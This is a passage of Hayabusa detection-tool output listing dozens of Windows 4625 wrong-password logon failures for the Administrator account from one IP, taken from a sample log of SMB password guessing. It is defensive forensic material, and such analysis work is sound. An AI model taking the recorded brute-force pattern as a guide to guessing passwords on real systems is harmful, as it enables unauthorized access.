192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.667 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.826 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.925 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.098 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.402 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.779 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.823 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.351 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.448 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.490 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:36.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.163 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.347 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.714 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.757 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:37.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.027 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.119 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 